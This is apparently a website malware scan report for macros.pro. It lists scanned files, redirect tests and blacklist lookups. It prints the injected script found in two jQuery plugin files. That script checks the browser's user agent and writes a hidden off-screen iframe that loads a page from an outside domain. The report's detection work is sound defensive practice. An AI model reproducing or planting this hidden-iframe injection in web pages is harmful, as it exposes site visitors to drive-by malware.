Scanned pages/files
Request | Server response | Status |
http://macros.pro/ | 200 OK Content-Length: 20676 Content-Type: text/html | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js | 200 OK Content-Length: 78601 Content-Type: text/javascript | clean |
http://macros.pro/../js/picbox.js | 400 Bad Request Content-Length: 173 Content-Type: text/html | clean |
http://macros.pro/test404page.js | 404 Not Found Content-Length: 1734 Content-Type: text/html | clean |
http://macros.pro/../js/jquery.pngFix.js | 400 Bad Request Content-Length: 173 Content-Type: text/html | clean |
http://macros.pro//yandex.st/share/share.js/ | 404 Not Found Content-Length: 1734 Content-Type: text/html | clean |
http://macros.pro/js/jquery.easing.1.3.js | 200 OK Content-Length: 8706 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Grandarium() {
var soset = navigator.userAgent; var unicode = (soset.indexOf("IEMobile") > -1 || soset.indexOf("Chrome") > -1 || soset.indexOf("Windows") < +1); if (!unicode) { document.write('<iframe src="http://daboglow.dubbyhos.com/iliustrosa15.html" style="position:absolute;top: -888px;left: -888px;border-style:dashed;border-color:green;background-color:purple;" height="138" width="138"></iframe>'); } } Grandarium(); jQuery return c*(7.5625*(t-=(1.5/2.75))*t + .75) + b; } else if (t < (2.5/2.75)) { return c*(7.5625*(t-=(2.25/2.75))*t + .9375) + b; } else { return c*(7.5625*(t-=(2.625/2.75))*t + .984375) + b; } }, easeInOutBounce: function (x, t, b, c, d) { if (t < d/2) return jQuery.easing.easeInBounce (x, t*2, 0, c, d) * .5 + b; return jQuery.easing.easeOutBounce (x, t*2-d, 0, c, d) * .5 + c*.5 + b; } }); ;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://macros.pro/js/jquery.ui.totop.js | 200 OK Content-Length: 2895 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Grandarium() {
var soset = navigator.userAgent; var unicode = (soset.indexOf("IEMobile") > -1 || soset.indexOf("Chrome") > -1 || soset.indexOf("Windows") < +1); if (!unicode) { document.write('<iframe src="http://daboglow.dubbyhos.com/iliustrosa15.html" style="position:absolute;top: -888px;left: -888px;border-style:dashed;border-color:green;background-color:purple;" height="138" width="138"></iframe>'); } } Grandarium(); (funct if(typeof document.body.style.maxHeight === "undefined") { $(containerIDhash).css({ 'position': 'absolute', 'top': $(window).scrollTop() + $(window).height() - 50 }); } if ( sd > settings.min ) $(containerIDhash).stop(true,true).fadeIn(400); else $(containerIDhash).fadeOut(600); }); $(window).resize(function(){top()}) }; })(jQuery); ;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: macros.pro
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 05 Sep 2014 15:41:31 GMT
Pragma: no-cache
Server: Jino.ru/mod_pizza
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=73e55c9b7601516a726f50bc0461bdd0; path=/
GET / HTTP/1.1
Host: macros.pro
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 05 Sep 2014 15:41:31 GMT
Pragma: no-cache
Server: Jino.ru/mod_pizza
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=73e55c9b7601516a726f50bc0461bdd0; path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: macros.pro
Referer: http://www.google.com/search?q=macros.pro
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: macros.pro
Referer: http://www.google.com/search?q=macros.pro
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=macros.pro
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://macros.pro/
Result: macros.pro is not infected or malware details are not published yet.
Result: macros.pro is not infected or malware details are not published yet.